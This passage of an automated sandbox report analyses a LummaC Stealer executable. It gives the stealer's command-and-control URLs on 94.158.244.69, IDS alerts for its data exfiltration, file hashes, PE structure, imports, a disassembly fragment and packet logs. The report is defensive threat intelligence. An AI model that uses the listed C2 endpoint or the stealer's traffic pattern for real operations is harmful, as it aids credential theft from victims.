                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://ocsp.rootca1.amazontrust.com0:cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://94.158.244.69/c2socklQcgln32y2HF.exe, 00000000.00000002.4574352613.00000000033F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://94.158.244.69/ocgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.ecosia.org/newtab/cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brcgln32y2HF.exe, 00000000.00000002.4575566340.0000000003E19000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://94.158.244.69/Bcgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ac.ecosia.org/autocomplete?q=cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://x1.c.lencr.org/0cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://x1.i.lencr.org/0cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?cgln32y2HF.exe, 00000000.00000002.4573480702.000000000311D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://94.158.244.69/Tcgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://94.158.244.69:80/c2sockcgln32y2HF.exe, 00000000.00000002.4575281035.000000000373C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://94.158.244.69:80/c2sock~fcgln32y2HF.exe, 00000000.00000002.4575281035.000000000373C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://94.158.244.69/cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://94.158.244.69/c2sockJQcgln32y2HF.exe, 00000000.00000002.4574352613.00000000033F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://support.mozilla.org/products/firefoxgro.allcgln32y2HF.exe, 00000000.00000002.4575566340.0000000003E19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://94.158.244.69/c2sock9Qcgln32y2HF.exe, 00000000.00000002.4574352613.00000000033F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        94.158.244.69
                                                        unknownMoldova Republic of
                                                        39798MIVOCLOUDMDtrue
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1555039
                                                        Start date and time:2024-11-13 10:49:53 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 10s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:4
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:cgln32y2HF.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:4b553069c339246833d06bdc506d9bf61010357a10ac56eb2e7ba59bbc01fd6f.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@0/1
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 95%
                                                        • Number of executed functions: 59
                                                        • Number of non-executed functions: 104
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240s for sample files taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: cgln32y2HF.exe
                                                        No simulations
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        94.158.244.69RX7nieXlNm.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        5M5e9srxkE.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        dV01QsYySM.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        BeO2C8S5Ly.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        ToNaCrWjm7.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        IVN6n1kO22.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        Mc8s3us2xa.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        SMZP2H8p7i.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        qh0kepGznl.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        No context
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        MIVOCLOUDMDRX7nieXlNm.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        5M5e9srxkE.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        dV01QsYySM.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        BeO2C8S5Ly.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        ToNaCrWjm7.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        IVN6n1kO22.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        Mc8s3us2xa.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        SMZP2H8p7i.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        qh0kepGznl.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        WindowsUPD.ps1Get hashmaliciousUnknownBrowse
                                                        • 94.158.244.69
                                                        No context
                                                        No context
                                                        No created / dropped files found
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.574702624249325
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.53%
                                                        • InstallShield setup (43055/19) 0.43%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:cgln32y2HF.exe
                                                        File size:445'952 bytes
                                                        MD5:21f41d9ec4e120f5bc7d543cde6a9cee
                                                        SHA1:1f0011eb8d2f01975e8291ebfe8efeccd7e44cb4
                                                        SHA256:4b553069c339246833d06bdc506d9bf61010357a10ac56eb2e7ba59bbc01fd6f
                                                        SHA512:66a44c592cad04d6e03a4cc004953f51854d34a4a98ff4b1775698efe5ca5a0359b0a6abcc9604c4f9826892fe7e50ff44634a3381dc4cdad9bb161a522541c3
                                                        SSDEEP:12288:NtwJ62+DFXIrNBLzSpF6xh7wsDxW1OKyx7:N2opIxBXS36xh7wwxt
                                                        TLSH:6694E01273D19871E9570A718E6AC2F86A2FF9B14F567BEB33585A2F0D302E1C672305
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.t.bp.Rbp.Rbp.R...Rvp.R...RLp.R...R.p.Rk..Rgp.Rbp.R.p.R...Rcp.R...Rcp.R...Rcp.RRichbp.R........................PE..L......a...
                                                        Icon Hash:25250d418549973e
                                                        Entrypoint:0x40b25f
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x61D6E097 [Thu Jan 6 12:29:11 2022 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:d26fb7e077310f1b46c902bf26f168fa
                                                        Instruction
                                                        call 00007F20B4DA9406h
                                                        jmp 00007F20B4DA289Eh
                                                        mov edi, edi
                                                        push ebp
                                                        mov ebp, esp
                                                        mov eax, dword ptr [ebp+08h]
                                                        xor ecx, ecx
                                                        cmp eax, dword ptr [0041F240h+ecx*8]
                                                        je 00007F20B4DA2A25h
                                                        inc ecx
                                                        cmp ecx, 2Dh
                                                        jc 00007F20B4DA2A03h
                                                        lea ecx, dword ptr [eax-13h]
                                                        cmp ecx, 11h
                                                        jnbe 00007F20B4DA2A20h
                                                        push 0000000Dh
                                                        pop eax
                                                        pop ebp
                                                        ret
                                                        mov eax, dword ptr [0041F244h+ecx*8]
                                                        pop ebp
                                                        ret
                                                        add eax, FFFFFF44h
                                                        push 0000000Eh
                                                        pop ecx
                                                        cmp ecx, eax
                                                        sbb eax, eax
                                                        and eax, ecx
                                                        add eax, 08h
                                                        pop ebp
                                                        ret
                                                        call 00007F20B4DA6450h
                                                        test eax, eax
                                                        jne 00007F20B4DA2A18h
                                                        mov eax, 0041F3A8h
                                                        ret
                                                        add eax, 08h
                                                        ret
                                                        call 00007F20B4DA643Dh
                                                        test eax, eax
                                                        jne 00007F20B4DA2A18h
                                                        mov eax, 0041F3ACh
                                                        ret
                                                        add eax, 0Ch
                                                        ret
                                                        mov edi, edi
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        call 00007F20B4DA29F7h
                                                        mov ecx, dword ptr [ebp+08h]
                                                        push ecx
                                                        mov dword ptr [eax], ecx
                                                        call 00007F20B4DA2997h
                                                        pop ecx
                                                        mov esi, eax
                                                        call 00007F20B4DA29D1h
                                                        mov dword ptr [eax], esi
                                                        pop esi
                                                        pop ebp
                                                        ret
                                                        mov edi, edi
                                                        push ebp
                                                        mov ebp, esp
                                                        sub esp, 4Ch
                                                        mov eax, dword ptr [0041F3DCh]
                                                        xor eax, ebp
                                                        mov dword ptr [ebp-04h], eax
                                                        push ebx
                                                        xor ebx, ebx
                                                        push esi
                                                        mov esi, dword ptr [ebp+08h]
                                                        push edi
                                                        mov dword ptr [ebp-2Ch], ebx
                                                        mov dword ptr [ebp-1Ch], ebx
                                                        mov dword ptr [ebp-20h], ebx
                                                        mov dword ptr [ebp-28h], ebx
                                                        mov dword ptr [ebp-24h], ebx
                                                        mov dword ptr [ebp-4Ch], esi
                                                        mov dword ptr [ebp-48h], ebx
                                                        cmp dword ptr [esi+14h], ebx
                                                        Programming Language:
                                                        • [ASM] VS2010 build 30319
                                                        • [C++] VS2010 build 30319
                                                        • [ C ] VS2010 build 30319
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [RES] VS2010 build 30319
                                                        • [LNK] VS2010 build 30319
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1d9240x3c.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e30000xb378.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x44d80x40.text
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x1e8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x1d45c0x1d6005d4c497de33f6864e8195520738ec3edFalse0.5244847074468085data6.498117631161349IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .data0x1f0000x2c37a40x4400067f4b572741264a79eb7f4ce48a4b561unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x2e30000xb3780xb4007873673bc5e1f62c57e83ca774cb8986False0.38374565972222224data4.341955285843472IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x2e34f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5027075812274369
                                                        RT_ICON0x2e34f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5027075812274369
                                                        RT_ICON0x2e3d980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5662442396313364
                                                        RT_ICON0x2e3d980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5662442396313364
                                                        RT_ICON0x2e44600x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.5563583815028902
                                                        RT_ICON0x2e44600x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.5563583815028902
                                                        RT_ICON0x2e49c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.43316135084427765
                                                        RT_ICON0x2e49c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.43316135084427765
                                                        RT_ICON0x2e5a700x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4151639344262295
                                                        RT_ICON0x2e5a700x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4151639344262295
                                                        RT_ICON0x2e63f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.4512411347517731
                                                        RT_ICON0x2e63f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.4512411347517731
                                                        RT_ICON0x2e68c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.31663113006396587
                                                        RT_ICON0x2e68c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.31663113006396587
                                                        RT_ICON0x2e77680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.3916967509025271
                                                        RT_ICON0x2e77680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.3916967509025271
                                                        RT_ICON0x2e80100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.4377880184331797
                                                        RT_ICON0x2e80100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.4377880184331797
                                                        RT_ICON0x2e86d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.4190751445086705
                                                        RT_ICON0x2e86d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.4190751445086705
                                                        RT_ICON0x2e8c400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.25570539419087135
                                                        RT_ICON0x2e8c400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.25570539419087135
                                                        RT_ICON0x2eb1e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.29080675422138835
                                                        RT_ICON0x2eb1e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.29080675422138835
                                                        RT_ICON0x2ec2900x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.3008196721311475
                                                        RT_ICON0x2ec2900x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.3008196721311475
                                                        RT_ICON0x2ecc180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.3351063829787234
                                                        RT_ICON0x2ecc180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.3351063829787234
                                                        RT_STRING0x2ed3a80x412dataTamilIndia0.45777351247600767
                                                        RT_STRING0x2ed3a80x412dataTamilSri Lanka0.45777351247600767
                                                        RT_STRING0x2ed7c00x360dataTamilIndia0.48032407407407407
                                                        RT_STRING0x2ed7c00x360dataTamilSri Lanka0.48032407407407407
                                                        RT_STRING0x2edb200x25edataTamilIndia0.4834983498349835
                                                        RT_STRING0x2edb200x25edataTamilSri Lanka0.4834983498349835
                                                        RT_STRING0x2edd800x5f6dataTamilIndia0.4351245085190039
                                                        RT_STRING0x2edd800x5f6dataTamilSri Lanka0.4351245085190039
                                                        RT_ACCELERATOR0x2ed0f80x90dataTamilIndia0.6944444444444444
                                                        RT_ACCELERATOR0x2ed0f80x90dataTamilSri Lanka0.6944444444444444
                                                        RT_GROUP_ICON0x2e68600x5adataTamilIndia0.7222222222222222
                                                        RT_GROUP_ICON0x2e68600x5adataTamilSri Lanka0.7222222222222222
                                                        RT_GROUP_ICON0x2ed0800x76dataTamilIndia0.6779661016949152
                                                        RT_GROUP_ICON0x2ed0800x76dataTamilSri Lanka0.6779661016949152
                                                        RT_VERSION0x2ed1980x20cdata0.5629770992366412
                                                        None0x2ed1880xadataTamilIndia1.8
                                                        None0x2ed1880xadataTamilSri Lanka1.8
                                                        DLLImport
                                                        KERNEL32.dllGetDriveTypeW, GetProfileIntW, GetConsoleAliasExesLengthA, LoadResource, InterlockedIncrement, WaitNamedPipeA, SetComputerNameW, OpenSemaphoreA, FreeEnvironmentStringsA, MoveFileWithProgressA, GetModuleHandleW, GetSystemTimeAsFileTime, EnumTimeFormatsW, SetProcessPriorityBoost, GetVolumePathNameW, GetPrivateProfileIntA, GetPrivateProfileStructW, GetSystemPowerStatus, GetCalendarInfoW, FreeConsole, GetFileAttributesW, WriteConsoleW, lstrcatA, GetShortPathNameA, EnumSystemLocalesA, DeleteFiber, SearchPathW, GetProcAddress, ResetEvent, LoadLibraryA, WriteConsoleA, GetProcessId, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, FindFirstVolumeMountPointW, QueryDosDeviceW, AddAtomA, SetSystemTime, GlobalWire, GetModuleFileNameA, FindNextFileA, CreateIoCompletionPort, GetModuleHandleA, FreeEnvironmentStringsW, CreateMailslotA, EnumDateFormatsW, CompareStringA, TerminateJobObject, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, EnumCalendarInfoExA, EnumSystemLocalesW, AreFileApisANSI, GetLastError, GlobalFix, WideCharToMultiByte, InterlockedDecrement, InterlockedExchange, MultiByteToWideChar, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapAlloc, HeapReAlloc, GetCommandLineA, HeapSetInformation, GetStartupInfoW, GetCPInfo, RaiseException, RtlUnwind, LCMapStringW, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, IsProcessorFeaturePresent, HeapCreate, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, SetFilePointer, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetStringTypeW, GetLocaleInfoW, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, IsValidLocale, GetConsoleCP, GetConsoleMode, LoadLibraryW, SetStdHandle, FlushFileBuffers, CreateFileW, CloseHandle
                                                        GDI32.dllGetCharABCWidthsA
                                                        Language of compilation systemCountry where language is spokenMap
                                                        TamilIndia
                                                        TamilSri Lanka
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-11-13T10:50:45.112747+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54997994.158.244.6980TCP
                                                        2024-11-13T10:50:45.112747+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54983694.158.244.6980TCP
                                                        2024-11-13T10:51:36.232008+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549755TCP
                                                        2024-11-13T10:51:47.843734+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54978894.158.244.6980TCP
                                                        2024-11-13T10:52:05.903144+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54988094.158.244.6980TCP
                                                        2024-11-13T10:52:14.410644+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549965TCP
                                                        2024-11-13T10:52:14.894678+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54992994.158.244.6980TCP
                                                        2024-11-13T10:52:23.675839+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54997894.158.244.6980TCP
                                                        2024-11-13T10:52:41.586763+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54998094.158.244.6980TCP
                                                        2024-11-13T10:52:42.381649+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54998294.158.244.6980TCP
                                                        2024-11-13T10:52:42.381649+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.54998294.158.244.6980TCP
                                                        2024-11-13T10:52:59.612142+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54998394.158.244.6980TCP
                                                        2024-11-13T10:53:08.398262+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54998494.158.244.6980TCP
                                                        2024-11-13T10:53:17.308529+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54998594.158.244.6980TCP
                                                        2024-11-13T10:53:26.119013+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54998694.158.244.6980TCP
                                                        2024-11-13T10:53:35.006309+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54998794.158.244.6980TCP
                                                        2024-11-13T10:53:43.823782+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.54998894.158.244.6980TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 13, 2024 10:51:39.357161999 CET4978880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:39.362869978 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.363140106 CET4978880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:39.363364935 CET4978880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:39.363765001 CET4978880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:39.368788004 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.368891001 CET4978880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:39.369215965 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.369225979 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.369236946 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.369343042 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.369353056 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.369363070 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.369374037 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.369379044 CET4978880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:39.369688988 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.369699001 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.376010895 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.376496077 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.376506090 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.376516104 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:39.376524925 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:47.843594074 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:47.843734026 CET4978880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:47.844388008 CET4978880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:47.849270105 CET804978894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.381798983 CET4983680192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:48.386600018 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.386814117 CET4983680192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:48.387343884 CET4983680192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:48.387384892 CET4983680192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:48.392174006 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.392188072 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.392198086 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.392249107 CET4983680192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:48.392257929 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.392267942 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.392323017 CET4983680192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:48.392375946 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.392394066 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.392509937 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.392520905 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.392538071 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.397197962 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.397211075 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.397228003 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.397237062 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.397263050 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.397274017 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:48.441327095 CET804983694.158.244.69192.168.2.5
